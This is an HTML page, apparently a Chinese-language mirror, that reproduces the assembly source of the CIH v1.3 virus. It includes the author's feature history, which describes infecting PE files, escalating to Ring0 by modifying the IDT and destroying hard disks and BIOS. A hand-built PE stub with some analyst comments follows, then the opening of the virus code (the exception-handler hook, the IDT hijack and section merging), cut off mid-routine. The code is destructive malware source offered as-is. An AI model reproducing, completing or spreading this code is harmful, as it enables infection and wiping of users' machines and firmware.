<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>CIH v1.3源程序</TITLE>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<STYLE type=text/css>BODY {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
TABLE {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
TD {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
INPUT {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
TEXTAREA {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
SELECT {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
CODE {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体r"
}
A {
COLOR: #005500
}
A:hover {
COLOR: #cc0000
}
.border {
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; LIST-STYLE-POSITION: inside; BORDER-LEFT: #000000 1px solid; BORDER-BOTTOM: #000000 1px solid; LIST-STYLE-TYPE: square; BACKGROUND-COLOR: transparent
}
</STYLE>
<META content="MSHTML 6.00.2600.0" name=GENERATOR></HEAD>
<BODY text=#000000 bgColor=#ffffff>
<TABLE borderColor=#339933 cellSpacing=0 borderColorDark=#ffffff cellPadding=0
width=405 borderColorLight=#000000 border=1>
<TBODY>
<TR vAlign=center bgColor=#009900>
<TD >
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD>
<TABLE width="65%" align=center border=0>
<TBODY>
<TR>
<TD bgColor=#009900>
<DIV align=center><FONT
face="Verdana, Arial, Helvetica, sans-serif"
color=#ffffff><B>CIH v1.3源程序</B></FONT></DIV>
</TD>
</TR>
</TBODY>
</TABLE>
<DIV align=center></DIV>
</TD>
</TR>
</TBODY>
</TABLE>
</TD>
</TR>
<TR vAlign=center align=left bgColor=#cccccc>
<TD></TD>
</TR>
<TR vAlign=top>
<TD class=tenpt><CODE><FONT color=#000000><br>
; ****************************************************************************
<br>
; * The Virus Program Information * <br>
; ****************************************************************************
<br>
; * * <br>
; * Designer : CIH Original Place : TTIT of Taiwan * <br>
; * Create Date : 04/26/1998 Now Version : 1.3 * <br>
; * Modification Time : 05/24/1998 * <br>
; * * <br>
; *==========================================================================*
<br>
; * Modification History * <br>
; *==========================================================================*
<br>
; * v1.0 1. Create the Virus Program. * <br>
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * <br>
; * 04/26/1998 3. Virus Code doesn't Reload into System. * <br>
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * <br>
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * <br>
; * 6. When System Opens Existing PE File, the File will be * <br>
; * Infected, and the File doesn't be Reinfected. * <br>
; * 7. It is also Infected, even the File is Read-Only. * <br>
; * 8. When the File is Infected, the Modification Date and Time * <br>
; * of the File also don't be Changed. * <br>
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * <br>
; * Previous FileSystemApiHook, it will Call the Function * <br>
; * that the IFS Manager Would Normally Call to Implement * <br>
; * this Particular I/O Request. * <br>
; * 10. The Virus Size is only 656 Bytes. * <br>
; *==========================================================================*
<br>
; * v1.1 1. Especially, the File that be Infected will not Increase * <br>
; * it's Size... ^__^ * <br>
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * <br>
; * When Exception Error Occurs, Our OS System should be in * <br>
; * Windows NT. So My Cute Virus will not Continue to Run, * <br>
; * it will Jmup to Original Application to Run. * <br>
; * 3. Use Better Algorithm, Reduce Virus Code Size. * <br>
; * 4. The Virus "Basic" Size is only 796 Bytes. * <br>
; *==========================================================================*
<br>
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * <br>
; * 2. Modify the Bug of v1.1 * <br>
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * <br>
; *==========================================================================*
<br>
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. * <br>
; * So When Open WinZip Self-Extractor ==> Don't Infect it. * <br>
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. * <br>
; ****************************************************************************
</FONT></CODE>
<p>.586P </p>
<p>; ****************************************************************************
<br>
; * Original PE Executable File(Don't Modify this Section) * <br>
; ****************************************************************************
</p>
<p>OriginalAppEXE SEGMENT </p>
; Analyst note: this segment is a hand-laid 210h-byte PE32 image stub (headers, <br>
; one .text section header, and the first 10h bytes of section raw data). <br>
; Offsets below are file offsets, counting 8 bytes per db row from FileHeader. <br>
<p>FileHeader: <br>
; 00h-3Fh: DOS header. Starts with 'MZ'; the dword at 3Ch (e_lfanew) is 80h. <br>
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h <br>
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h <br>
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h <br>
; 40h-7Fh: DOS stub code followed by the ASCII text <br>
; "This program cannot be run in DOS mode." CR CR LF '$'. <br>
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh <br>
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h <br>
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h <br>
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh <br>
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh <br>
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h <br>
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah <br>
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
; 80h: 'PE',0,0 signature, then the COFF file header: <br>
; Machine = 014Ch (i386), NumberOfSections = 1, TimeDateStamp = 352068F1h, <br>
; SizeOfOptionalHeader = 00E0h, Characteristics = 010Fh. <br>
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h <br>
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h <br>
; 98h: optional header. Magic = 010Bh (PE32), linker version 5.0, <br>
; SizeOfCode = 1000h. <br>
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
; AddressOfEntryPoint = 00001010h, BaseOfCode = 00001000h. <br>
; NOTE(review): with the .text header below (VirtualAddress 1000h, <br>
; PointerToRawData 200h) this RVA maps to file offset 210h, the first byte <br>
; past the end of this segment, not to the byte at 200h. Presumably the next <br>
; segment is placed there; confirm against the linked image. <br>
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h <br>
; BaseOfData = 00002000h, ImageBase = 00400000h. <br>
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h <br>
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h <br>
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h <br>
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h <br>
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
; 178h: the only section header, named ".text": <br>
; VirtualSize = 1000h, VirtualAddress = 1000h, SizeOfRawData = 1000h, <br>
; PointerToRawData = 200h, Characteristics = 60000020h. <br>
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h <br>
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h <br>
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h <br>
; 1A0h-1FFh: zero padding up to the section's raw data at 200h. <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
; 200h: a single C3h byte (the x86 near RET opcode) followed by seven zero bytes. <br>
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
; 208h: two dwords, 0 and VirusSize. VirusSize is defined outside this <br>
; excerpt; how these two fields are consumed is not visible here. <br>
dd 00000000h, VirusSize </p>
<p>OriginalAppEXE ENDS </p>
<p>; ****************************************************************************
<br>
; * My Virus Game * <br>
; ****************************************************************************
</p>
<p>; ********************************************************* <br>
; * Constant Define * <br>
; ********************************************************* </p>
<p>TRUE = 1 <br>
FALSE = 0 </p>
<p>DEBUG = TRUE </p>
<p>MajorVirusVersion = 1 <br>
MinorVirusVersion = 3 </p>
<p>VirusVersion = MajorVirusVersion*10h+MinorVirusVersion </p>
<p><br>
IF DEBUG </p>
<p>FirstKillHardDiskNumber = 81h <br>
HookExceptionNumber = 05h </p>
<p>ELSE </p>
<p>FirstKillHardDiskNumber = 80h <br>
HookExceptionNumber = 03h </p>
<p>ENDIF </p>
<p><br>
FileNameBufferSize = 7fh </p>
<p>; ********************************************************* <br>
; ********************************************************* </p>
<p>VirusGame SEGMENT </p>
<p>ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame <br>
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame </p>
<p>; ********************************************************* <br>
; * Ring3 Virus Game Initial Program * <br>
; ********************************************************* </p>
<p>MyVirusStart: <br>
push ebp </p>
<p>; ************************************* <br>
; * Let's Modify Structured Exception * <br>
; * Handing, Prevent Exception Error * <br>
; * Occurrence, Especially in NT. * <br>
; ************************************* </p>
<p>lea eax, [esp-04h*2] </p>
<p>xor ebx, ebx <br>
xchg eax, fs:[ebx] </p>
<p>call @0 <br>
@0: <br>
pop ebx </p>
<p>lea ecx, StopToRunVirusCode-@0[ebx] <br>
push ecx </p>
<p>push eax </p>
<p>; ************************************* <br>
; * Let's Modify * <br>
; * IDT(Interrupt Descriptor Table) * <br>
; * to Get Ring0 Privilege... * <br>
; ************************************* </p>
<p>push eax ; <br>
sidt [esp-02h] ; Get IDT Base Address <br>
pop ebx ; </p>
<p>add ebx, HookExceptionNumber*08h+04h ; ZF = 0 </p>
<p>cli </p>
<p>mov ebp, [ebx] ; Get Exception Base <br>
mov bp, [ebx-04h] ; Entry Point </p>
<p>lea esi, MyExceptionHook-@1[ecx] </p>
<p>push esi </p>
<p>mov [ebx-04h], si ; <br>
shr esi, 16 ; Modify Exception <br>
mov [ebx+02h], si ; Entry Point Address </p>
<p>pop esi </p>
<p>; ************************************* <br>
; * Generate Exception to Get Ring0 * <br>
; ************************************* </p>
<p>int HookExceptionNumber ; GenerateException <br>
ReturnAddressOfEndException = $ </p>
<p>; ************************************* <br>
; * Merge All Virus Code Section * <br>
; ************************************* </p>
<p>push esi <br>
mov esi, eax </p>
<p>LoopOfMergeAllVirusCodeSection: </p>
<p>mov ecx, [eax-04h] </p>
<p>rep movsb </p>
<p>sub eax, 08h </p>
<p>mov esi, [eax] </p>
<p>or esi, esi <br>
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 </p>
<p>jmp LoopOfMergeAllVirusCodeSection </p>
<p>QuitLoopOfMergeAllVirusCodeSection: </p>
<p>pop esi </p>
<p>; ************************************* <br>
; * Generate Exception Again * <br>
; ************************************* </p>
<p>int HookExceptionNumber ; GenerateException Again </p>
<p>; ************************************* <br>
; * Let's Restore * <br>
; * Structured Exception Handing * <br>
; ************************************* </p>
<p>ReadyRestoreSE: <br>
sti </p>
<p>xor ebx, ebx </p>
<p>jmp RestoreSE </p>
<p>; ************************************* <br>
; * When Exception Error Occurs, * <br>
; * Our OS System should be in NT. * <br>
; * So My Cute Virus will not * <br>
; * Continue to Run, it Jmups to * <br>
; * Original Application to Run. * <br>
; ************************************* </p>
<p>StopToRunVirusCode: <br>
@1 = StopToRunVirusCode </p>
<p>xor ebx, ebx <br>
mov eax, fs:[ebx] <br>
mov esp, [eax] </p>
<p>RestoreSE: <br>
pop dword ptr fs:[ebx] <br>